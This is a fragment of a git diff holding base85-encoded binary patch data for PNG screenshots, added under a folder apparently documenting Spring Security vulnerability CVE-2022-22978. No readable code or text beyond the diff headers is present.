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

literal 0
HcmV?d00001

diff --git a/cve/java-spring-security/2022/CVE-2022-22978/img_1.png b/cve/java-spring-security/2022/CVE-2022-22978/img_1.png
new file mode 100644
index 0000000000000000000000000000000000000000..7209864900bb1ff0df6a98b93d93f891a5414306
GIT binary patch
literal 40601
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
